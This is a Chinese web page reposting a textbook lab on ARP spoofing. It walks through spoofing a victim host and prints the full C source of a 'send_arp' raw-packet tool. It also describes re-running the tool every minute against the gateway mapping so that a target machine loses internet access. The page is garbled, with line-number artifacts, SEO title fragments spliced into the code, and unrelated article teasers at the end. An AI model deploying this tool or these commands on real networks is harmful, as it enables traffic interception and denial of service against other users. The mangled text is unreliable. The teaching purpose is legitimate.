arp欺骗的实质是 arp欺骗的现实

1.实验环境

实验环境如图5-34所示。欺骗者(192.168.1.10),被欺骗者(192.168.1.20)。

2.arp欺骗过程

第1步:被欺骗者可以ping通欺骗者。被欺骗者(192.168.1.20)执行ping192.168.1.10 -n 1命令,可以ping通。然后执行arp -a命令查看arp缓存,得知欺骗者(192.168.1.10)的MAC地址为00:30:18:91:20:54,如图5-35所示。

第2步:进行arp欺骗。如图5-36所示,欺骗者(192.168.1.10)先执行ping 192.168.1.20 -c 1命令,可以ping通。然后执行arp -a命令查看arp缓存,得知被欺骗者(192.168.1.20)的MAC地址为00:C0:9F:97:E3:F9。再执行ifconfig eth0命令,查看本网卡的MAC地址,然后执行./send_arp.o192.168.1.10 00:0c:29:d5:91:11192.168.1.2000:C0:9F:97:E3:F9 1命令,对192.168.1.20进行arp欺骗。其中,send_arp.o语法为:

send_arp src_ip_addr src_hw_addr targ_ip_addrtar_hw_addr number

提示:

被欺骗者(192.168.1.20)MAC地址的获得可以先执行ping 192.168.1.10命令,然后执行arp -a命令查看arp缓存。

第3步:被欺骗者不可以ping通欺骗者。如图5-37所示,先执行ping192.168.1.10 -n 1命令,不可以ping通,再执行arp-a命令查看arp缓存,可知192.168.1.10的MAC地址已变。

如果本网络的网关是192.168.1.1,那么想让192.168.1.20不能访问互联网,就可以执行命令./send_arp.o 192.168.1.1xx:xx:xx:xx:xx:xx 192.168.1.2000:C0:9F:97:E3:F9 1命令,对192.168.1.20进行arp欺骗。可以每分钟执行一次该命令,192.168.1.20得不到正确的到网关的arp映射表项,就访问不了互联网了。

3.源程序

头文件“send_arp.h”:

?1???? #include <stdlib.h>

?2???? #include <netdb.h>

?3???? #include <sys/socket.h>

?4???? #include <sys/types.h>

?5???? #include <stdio.h>

?6???? #include <errno.h>

?7???? #include <sys/ioctl.h>

?8???? #include <net/if.h>

?9???? #include <signal.h>

10???? #include<netinet/ip.h>

11???? #include<netinet/in.h>

arp欺骗的现实_arp欺骗

12???? #include <string.h>

13???? #include<arpa/inet.h>

14???? #include<netinet/ip_icmp.h>

15???? #include<linux/if_ether.h>

16????

17???? #define ETH_HW_ADDR_LEN6?

18???? #define IP_ADDR_LEN 4?

19???? #define ARP_FRAME_TYPE0x0806?

20???? #define ETHER_HW_TYPE1?

21???? #define IP_PROTO_TYPE0x0800?

22???? #define OP_ARP_REQUEST2?

23???? #define OP_ARP_QUEST 1

24???? #define DEFAULT_DEVICE"eth0"?

25???? char usage[] ={"send_arp: sends out custom ARP packet. n"

26???? "usage: send_arpsrc_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"};?

27????

28???? struct arp_packet?

29???? {?

30?????????????? u_chartarg_hw_addr[ETH_HW_ADDR_LEN];?

31?????????????? u_charsrc_hw_addr[ETH_HW_ADDR_LEN];?

32?????????????? u_shortframe_type;?

33?????????????? u_shorthw_type;?

34?????????????? u_shortprot_type;?

35?????????????? u_charhw_addr_size;?

36?????????????? u_charprot_addr_size;?

37?????????????? u_short op;?

38?????????????? u_charsndr_hw_addr[ETH_HW_ADDR_LEN];?

39?????????????? u_charsndr_ip_addr[IP_ADDR_LEN];?

40?????????????? u_charrcpt_hw_addr[ETH_HW_ADDR_LEN];?

41?????????????? u_charrcpt_ip_addr[IP_ADDR_LEN];?

42?????????????? u_charpadding[18];?

43???? };?

44????

45???? void die (char *);?

46???? void get_ip_addr (structin_addr *, char *);?

47???? void get_hw_addr (char *,char *);?

源文件“send_arp.c”:

?1???? #include "send_arp.h"

?2????

?3???? int main (int argc, char * argv[])?

?4???? {?

?5?????????????? struct in_addr src_in_addr, targ_in_addr;?

?6?????????????? struct arp_packet pkt;?

?7?????????????? struct sockaddr sa;?

?8?????????????? int sock;?

?9?????????????? int j,number;

10?????????????? if (argc !=6)?

11??????????????????????? die(usage);?

12??????????????

13?????????????? sock =socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP));?

14?????????????? if (sock <0)?

15?????????????? {?

16??????????????????????? perror("socket");?

17??????????????????????? exit(1);?

18?????????????? }?

19??????????????

20?????????????? number=atoi(argv[5]);

21??????????????

22?????????????? pkt.frame_type =htons(ARP_FRAME_TYPE);?

arp欺骗的现实_arp欺骗

23?????????????? pkt.hw_type =htons(ETHER_HW_TYPE);?

24?????????????? pkt.prot_type =htons(IP_PROTO_TYPE);?

25?????????????? pkt.hw_addr_size= ETH_HW_ADDR_LEN;?

26?????????????? pkt.prot_addr_size= IP_ADDR_LEN;?

27?????????????? pkt.op =htons(OP_ARP_QUEST);?

28?????????????? get_hw_addr(pkt.targ_hw_addr,argv[4]);?

29?????????????? get_hw_addr(pkt.rcpt_hw_addr,argv[4]);?

30?????????????? get_hw_addr(pkt.src_hw_addr,argv[2]);?

31?????????????? get_hw_addr(pkt.sndr_hw_addr,argv[2]);?

32?????????????? get_ip_addr(&src_in_addr,argv[1]);?

33?????????????? get_ip_addr(&targ_in_addr,argv[3]);?

34?????????????? memcpy(pkt.sndr_ip_addr,&src_in_addr, IP_ADDR_LEN);?

35?????????????? memcpy(pkt.rcpt_ip_addr,&targ_in_addr, IP_ADDR_LEN);?

36?????????????? bzero(pkt.padding,18);?

37?????????????? strcpy(sa.sa_data,DEFAULT_DEVICE);?

38?????????????? for(j=0;j<number;j++)

39?????????????? {

40??????????????????????? if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0)?

41??????????????????????? {?

42???????????????????????????????? perror("sendto");?

43???????????????????????????????? exit(1);?

44??????????????????????? }??

45?????????????? }

46?????????????? exit(0);?

47???? }

48????

49???? void die (char *str)?

50???? {?

51?????????????? fprintf(stderr,"%sn",str);?

52?????????????? exit(1);?

53???? }?

54????

55???? void get_ip_addr (structin_addr *in_addr, char *str)?

56???? {?

57?????????????? struct hostent*hostp;?

58?????????????? in_addr->s_addr= inet_addr(str);?

59?????????????? if(in_addr->s_addr== -1)

60?????????????? {?

61??????????????????????? if ((hostp= gethostbyname(str)))?

62???????????????????????????????? bcopy(hostp->h_addr,in_addr, hostp->h_length);?

63??????????????????????? else{?

arp欺骗的实质是 arp欺骗的现实

64???????????????????????????????? fprintf(stderr,"send_arp: unknown host %sn", str);?

65???????????????????????????????? exit(1);?

66??????????????????????? }?

67?????????????? }?

68???? }

69????

70???? void get_hw_addr (char*buf, char *str)?

arp欺骗的现实_arp欺骗

71???? {?

72?????????????? int i;?

73?????????????? char c, val;?

74?????????????? for(i = 0; i <ETH_HW_ADDR_LEN; i++)?

75?????????????? {?

76??????????????????????? if (!(c= tolower(*str++)))?

77???????????????????????????????? die("Invalidhardware address");?

78??????????????????????? if(isdigit(c))?

79???????????????????????????????? val= c - '0';?

80??????????????????????? else if(c >= 'a' && c <= 'f')?

81???????????????????????????????? val= c-'a'+10;?

82??????????????????????? else?

83???????????????????????????????? die("Invalidhardware address");?

84??????????????????????? *buf =val << 4;?

85??????????????????????? if (!(c= tolower(*str++)))?

86???????????????????????????????? die("Invalidhardware address");?

87??????????????????????? if(isdigit(c))?

88???????????????????????????????? val= c - '0';?

89??????????????????????? else if(c >= 'a' && c <= 'f')?

90???????????????????????????????? val= c-'a'+10;?

91??????????????????????? else?

92???????????????????????????????? die("Invalidhardware address");?

93??????????????????????? *buf++|= val;?

94??????????????????????? if (*str== ':')?

95???????????????????????????????? str++;?

96?????????????? }?

97???? }

  

爱华网本文地址 » http://www.413yy.cn/a/8104090103/175745.html

更多阅读

关于儒学的现实关怀与终极关怀 哲学的终极关怀

哲学之极——关于儒学的现实关怀与终极关怀程志华 胡素杰内容摘要:自杀、尤其是大学生自杀不断引来学界关于死亡的话题,许多专家学者从不同角度对此进行了探讨和解说。然而,这些探讨和解说往往忽略一个重要问题,这就是,作为意义诠释基础

凯撒·克朗跟庞克哈萨德岛的现实探索 庞克咖啡学院

凯撒·克朗跟庞克哈萨德岛的现实探索小叨 在漫画第664话中~一直隐藏着的“M”终于浮出了海面,他就是M·凯撒·克朗。 在漫画中已经说到了。M·凯撒·克朗是原政府科学家,而且还有悬赏金额是三亿贝利!话说,这个可真不是小数目呢!说明

中小学校学习雷锋的现实意义

中小学校学习雷锋的现实意义梁好今年是雷锋同志逝世五十周年,中央办公厅印发了,《关于深入开展学雷锋活动的意见》,全国上下刮起了纪念雷锋、学习雷锋的新高潮。青少年儿童是学习雷锋的骨干与中坚力量,大力弘扬新时代雷锋精神,助推学习

浅论儒家思想的现实意义 儒家思想在当代的意义

浅论儒家思想的现实意义儒家思想自产生之日起就颇受瞩目,其侧重社会取向的价值观,富有伦理特色的政治观,追求自我完善的道德观,在封建时代长期成为官方的统治思想。儒家思想,在世界观方面,它是理性的;在人生目的方面,它是功利的;在处理人际

声明:《arp欺骗的实质是 arp欺骗的现实》为网友我吃货我自豪分享!如侵犯到您的合法权益请联系我们删除